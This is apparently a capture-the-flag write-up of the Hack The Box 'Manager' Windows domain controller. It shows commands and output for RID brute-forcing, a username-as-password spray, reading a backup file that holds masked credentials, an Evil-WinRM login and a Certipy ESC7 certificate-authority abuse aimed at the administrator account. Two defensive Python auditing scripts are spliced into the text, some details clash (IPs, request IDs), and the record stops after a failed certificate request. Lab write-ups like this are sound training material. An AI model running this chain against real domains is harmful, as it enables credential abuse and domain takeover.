
@simran-sankhala
Last active December 30, 2023 11:45
Manager HTB

Target IP Address

10.10.11.236

nmap -sC -sV 10.10.11.236 -oN manager

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-11 15:32 IST
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 7.69% done; ETC: 15:33 (0:00:48 remaining)
Nmap scan report for 10.10.11.236
Host is up (0.13s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Manager
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-11 17:02:58Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-11T17:04:19+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|  10.10.11.236:1433:
|    Version:
|      name: Microsoft SQL Server 2019 RTM
|      number: 15.00.2000.00
|      Product: Microsoft SQL Server 2019
|      Service pack level: RTM
|      Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info:
|  10.10.11.236:1433:
|    Target_Name: MANAGER
|    NetBIOS_Domain_Name: MANAGER
|    NetBIOS_Computer_Name: DC01
|    DNS_Domain_Name: manager.htb
|    DNS_Computer_Name: dc01.manager.htb
|    DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-12-11T16:47:10
|_Not valid after:  2053-12-11T16:47:10
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:18+00:00; +7h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-12-11T17:04:19+00:00; +7h00m00s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
|  311:
|_    Message signing enabled and required
| smb2-time:
|  date: 2023-12-11T17:03:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.02 seconds

We can see that quite a lot of ports are open; the interesting ones are SMB, LDAP, HTTP and MSSQL. We first enumerate users by brute-forcing RIDs with the CrackMapExec program.

Crackmapexec program

crackmapexec smb manager.htb -u anonymous -p "" --rid-brute 10000
[*]First time use detected
[*]Creating home directory structure
[*]Creating default workspace
[*]Initializing SSH protocol database
[*]Initializing LDAP protocol database
[*]Initializing WINRM protocol database
[*]Initializing FTP protocol database
[*]Initializing SMB protocol database
[*]Initializing RDP protocol database
[*]Initializing MSSQL protocol database
[*]Copying default configuration file
[*]Generating SSL certificate
SMB        manager.htb    445    DC01           
[*]Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB        manager.htb    445    DC01            [+] manager.htb\anonymous:
SMB        manager.htb    445    DC01            [+] Brute forcing RIDs
SMB        manager.htb    445    DC01            498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            500: MANAGER\Administrator (SidTypeUser)
SMB        manager.htb    445    DC01            501: MANAGER\Guest (SidTypeUser)
SMB        manager.htb    445    DC01            502: MANAGER\krbtgt (SidTypeUser)
SMB        manager.htb    445    DC01            512: MANAGER\Domain Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            513: MANAGER\Domain Users (SidTypeGroup)
SMB        manager.htb    445    DC01            514: MANAGER\Domain Guests (SidTypeGroup)
SMB        manager.htb    445    DC01            515: MANAGER\Domain Computers (SidTypeGroup)
SMB        manager.htb    445    DC01            516: MANAGER\Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            517: MANAGER\Cert Publishers (SidTypeAlias)
SMB        manager.htb    445    DC01            518: MANAGER\Schema Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB        manager.htb    445    DC01            521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB        manager.htb    445    DC01            525: MANAGER\Protected Users (SidTypeGroup)
SMB        manager.htb    445    DC01            526: MANAGER\Key Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB        manager.htb    445    DC01            553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB        manager.htb    445    DC01            571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB        manager.htb    445    DC01            572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB        manager.htb    445    DC01            1000: MANAGER\DC01$ (SidTypeUser)
SMB        manager.htb    445    DC01            1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB        manager.htb    445    DC01            1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB        manager.htb    445    DC01            1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB        manager.htb    445    DC01            1113: MANAGER\Zhong (SidTypeUser)
SMB        manager.htb    445    DC01            1114: MANAGER\Cheng (SidTypeUser)
SMB        manager.htb    445    DC01            1115: MANAGER\Ryan (SidTypeUser)
SMB        manager.htb    445    DC01            1116: MANAGER\Raven (SidTypeUser)
SMB        manager.htb    445    DC01            1117: MANAGER\JinWoo (SidTypeUser)
SMB        manager.htb    445    DC01            1118: MANAGER\ChinHae (SidTypeUser)
SMB        manager.htb    445    DC01            1119: MANAGER\Operator (SidTypeUser)
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ nano users.txt                                                 
zhong
cheng
ryan
ravan
jinwoo
chinhae
operator

Here you can see that I got some valid users on this machine.

Now save the names in a txt file and try to log in with them, using each name as both username and password (the command below targets MSSQL):

crackmapexec mssql manager.htb -u users.txt -p users.txt
MSSQL      manager.htb    1433  DC01           
[*]Windows 10.0 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MANAGER\Guest'.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
MSSQL      manager.htb    1433  DC01            [+] manager.htb\operator:operator


[+] manager.htb\operator:operator

During enumeration, I found a valid user named “operator”.

In this step we can see that the operator user can authenticate to MSSQL. We connect to it to see whether there is anything inside, using the command:

┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager]
└─$ impacket-mssqlclient -port 1433 manager.htb/operator:operator@10.10.11.236 -window
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*]Encryption required, switching to TLS
[*]ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*]ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*]ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*]INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*]INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*]ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands


Here I found a stored procedure, xp_dirtree, that lists the files available on the server. I executed it against the IIS web root and got some file names.

EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;


SQL> EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory                       depth   file
---------------------------------  ------  -----
about.html                              1      1
contact.html                            1      1
css                                     1      0
images                                  1      0
index.html                              1      1
js                                      1      0
service.html                            1      1
web.config                              1      1
website-backup-27-07-23-old.zip         1      1

SQL>

website-backup-27-07-23-old.zip

Here I get a backup file named “website-backup-27-07-23-old.zip”. Let’s download this file and see what it actually contains.

wget 10.10.11.236/website-backup-27-07-23-old.zip
--2023-11-03 04:28:30--  http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip                            100%[========================================================================================================================================>]  1021K  168KB/s    in 9.3s   

2023-11-03 04:28:40 (109 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]
┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager/website-backup-27-07-23-old.zip]
└─$ ls
about.html  contact.html  css  images  index.html  js  service.html

┌──(root㉿kali)-[~/Desktop/manager/HTB_Manager/website-backup-27-07-23-old.zip]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
        <user>raven@manager.htb</user>
        <password>R**************3</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
  </server>
  <search type="full">
      <dir-list>
        <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
  </search>
</ldap-conf>

user-raven@manager.htb
password-R***************3
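The hidden .old-conf.xml is exactly the kind of file a plain ls skips and a backup audit should not. As an added example (not part of this writeup), the script below opens a backup archive, visits every member including dotfiles, parses any ldap-conf document it finds and reports whether it carries a cleartext bind password and whether the secure port is disabled; the archive and the password value are constructed placeholders shaped like the one found on the box.

```python
"""Audit a website backup archive for ldap-conf files that embed
credentials, including dotfiles a plain `ls` would not show.

Added example, not part of the original writeup. The archive and the
password value below are constructed placeholders that mirror the layout
found on the box.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample: same structure as the .old-conf.xml in the backup,
# with a placeholder instead of the real bind password.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <access-user>
      <user>raven@manager.htb</user>
      <password>PLACEHOLDER-BIND-PASSWORD</password>
    </access-user>
  </server>
</ldap-conf>
"""


def build_sample_zip():
    """Build an in-memory zip shaped like website-backup-27-07-23-old.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html></html>")
        zf.writestr("css/style.css", "body {}")
        zf.writestr(".old-conf.xml", SAMPLE_CONF)   # the hidden config file
    return buf.getvalue()


def audit_ldap_conf(xml_bytes):
    """Parse one <ldap-conf> document; return None if it is something else."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "ldap-conf":
        return None
    server = root.find("server")
    if server is None:
        return None
    password = server.findtext("access-user/password", default="")
    secure = server.find("secure-port")
    ldaps_enabled = secure is not None and secure.get("enabled", "").lower() == "true"
    return {
        "host": server.findtext("host", default=""),
        "bind_user": server.findtext("access-user/user", default=""),
        # A non-empty <password> means the bind credential sits in the backup in clear.
        "has_cleartext_password": bool(password.strip()),
        # With the secure port disabled, a simple bind on 389 also crosses the wire in clear.
        "ldaps_enabled": ldaps_enabled,
    }


def scan_backup(zip_bytes):
    """Walk every archive member (dotfiles included) and collect ldap-conf findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            if not base.lower().endswith(".xml"):
                continue
            try:
                report = audit_ldap_conf(zf.read(info.filename))
            except ET.ParseError:
                continue
            if report is not None:
                report["member"] = info.filename
                report["hidden"] = base.startswith(".")
                findings.append(report)
    return findings


if __name__ == "__main__":
    # The report never echoes the password itself, only whether one is present.
    for f in scan_backup(build_sample_zip()):
        print(f"{f['member']} (hidden={f['hidden']}): bind user {f['bind_user']} on {f['host']}, "
              f"cleartext password={f['has_cleartext_password']}, LDAPS={f['ldaps_enabled']}")
```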

Gaining User Access:

We proceeded by connecting through Evil-winrm with a simple command, and in no time, we effortlessly obtained the user flag.

┌──(root㉿kali)-[/home/megatron/Desktop/manager/HTB_Manager]
└─# evil-winrm -i 10.10.11.236 -u raven -p 'R*************23'             

                                       
Evil-WinRM shell v3.5
                                       
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                       
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                       
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> dir
*Evil-WinRM* PS C:\Users\Raven\Documents> ls
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../
*Evil-WinRM* PS C:\Users\Raven> ls


    Directory: C:\Users\Raven


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
d-r---        7/27/2023  8:24 AM                Desktop
d-r---        7/27/2023  8:23 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\Raven> cd Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls


    Directory: C:\Users\Raven\Desktop


Mode                LastWriteTime        Length Name
----                -------------        ------ ----
-ar---      12/11/2023  8:47 AM            34 user.txt


*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
**********************************

Connecting with Evil-WinRM as raven using the command above gives us the user flag.

Privilege Escalation

Most of the time Certify.exe is not present on the target machine; in my case it was not, although many of the writeups I referred to used it. Compiled Ghostpack binaries (including Certify.exe) are available here:

https://github.com/depradip/Ghostpack_CompiledBinaries/tree/main/Ghostpack-CompiledBinaries
https://github.com/depradip/Ghostpack_CompiledBinaries/tree/main

We also see that the user holds SeMachineAccountPrivilege, which allows adding computer accounts to the domain, but that route gives us an error, so we move on.

We check whether the system has vulnerable certificate templates that could help us escalate:

$ certipy find -vulnerable -stdout -u raven@manager.htb -p 'R*************23' -dc-ip 10.129.143.233
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*]Finding certificate templates
[*]Found 33 certificate templates
[*]Finding certificate authorities
[*]Found 1 certificate authority
[*]Found 11 enabled certificate templates
[*]Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*]Got CA configuration for 'manager-DC01-CA'
[*]Enumeration output:
Certificate Authorities
  0
    CA Name                            : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number          : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                : Issue
    Enforce Encryption for Requests    : Enabled
    Permissions
      Owner                            : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                  : [!] Could not find any certificate templates

No vulnerable templates are listed, but the output shows that Raven holds ManageCa on the CA and that the CA's request disposition is Issue. Certipy flags this as ESC7, so a quick search leads to the HackTricks post that explains how this misconfiguration can be exploited.
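As an added example (not from this writeup and not Certipy's own code), here is a small parser that reads the enumeration output above and applies the ESC7 rule Certipy applies: any principal outside the built-in admin groups that holds ManageCa or ManageCertificates on a CA is flagged. The sample input is constructed from the permissions block shown above.

```python
"""Re-run the ESC7 check over Certipy's text output.

Added example, not part of the original writeup or of Certipy: it parses
the 'Certificate Authorities' block Certipy prints and flags any principal
outside the built-in admin groups that holds ManageCa or ManageCertificates,
which is what Certipy reports as ESC7.
"""
import re

# Sample input constructed from the Certipy enumeration output in the writeup.
CERTIPY_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Request Disposition                 : Issue
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
"""

# Principals that are expected to administer a CA; anyone else with these
# rights can add officers, enable templates or issue pending requests.
PRIVILEGED = {"administrators", "domain admins", "enterprise admins", "domain controllers"}
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")

KEY_LINE = re.compile(r"^\s+([A-Za-z ]+?)\s*:\s*(.*)$")   # "    Key   : value"
CONT_LINE = re.compile(r"^\s{30,}(\S.*)$")                # deeply indented continuation


def parse_ca_permissions(text):
    """Return {ca_name: {"disposition": str|None, "rights": {right: [principals]}}}."""
    cas, current, right = {}, None, None
    for line in text.rstrip("\n").splitlines():
        line = line.rstrip()
        m = KEY_LINE.match(line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "CA Name":
                current = {"disposition": None, "rights": {}}
                cas[value] = current
                right = None
            elif current is not None and key == "Request Disposition":
                current["disposition"] = value
                right = None
            elif current is not None and key in ("Enroll",) + DANGEROUS_RIGHTS:
                right = key                       # first principal is on the key line
                current["rights"].setdefault(right, []).append(value)
            else:
                right = None
            continue
        m = CONT_LINE.match(line)
        if m and current is not None and right is not None:
            current["rights"][right].append(m.group(1).strip())
            continue
        right = None     # any other line ends the current right block
    return cas


def find_esc7(cas):
    """List (ca, right, principal) for non-privileged principals holding CA management rights."""
    findings = []
    for ca, info in cas.items():
        for right in DANGEROUS_RIGHTS:
            for principal in info["rights"].get(right, []):
                short = principal.split("\\", 1)[-1].lower()   # drop the DOMAIN\ prefix
                if short not in PRIVILEGED:
                    findings.append((ca, right, principal))
    return findings


if __name__ == "__main__":
    cas = parse_ca_permissions(CERTIPY_OUTPUT)
    for ca, right, who in find_esc7(cas):
        print(f"[ESC7] {who} holds {right} on {ca} "
              f"(request disposition: {cas[ca]['disposition']})")
```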

So, following the post, the first step is to add our user as a CA officer:

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#vulnerable-certificate-authority-access-control-esc7

Related to the SubCA template is Vulnerable Certificate Authority Access Control (ESC7), which HackTricks describes as Attack 2 and which I use here. We can use the commands as given in HackTricks. ‘certipy-ad’ is a tool for working with certificates in an Active Directory environment: it can enumerate, request, issue and retrieve certificates. Given the role of ‘certify.exe’ in other writeups and its connection to certificates, I decided to use ‘certipy-ad’ as the means to escalate my privileges.

You can install certipy-ad with the command sudo apt install certipy-ad, or from https://github.com/ly4k/Certipy

certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R************3' && \
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4**********3' && \
certipy req -username raven@manager.htb -password 'R***********3' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb && \
certipy ca -ca "manager-DC01-CA" -issue-request 14 -username 'raven@manager.htb' -password 'R***********3' && \
certipy req -username 'raven@manager.htb' -password 'R*************3' -ca "manager-DC01-CA" -target manager.htb -retrieve 14

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]User 'Raven' already has officer rights on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*]Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*]Request ID is 17
Would you like to save the private key? (y/N) y
[*]Saved private key to 17.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

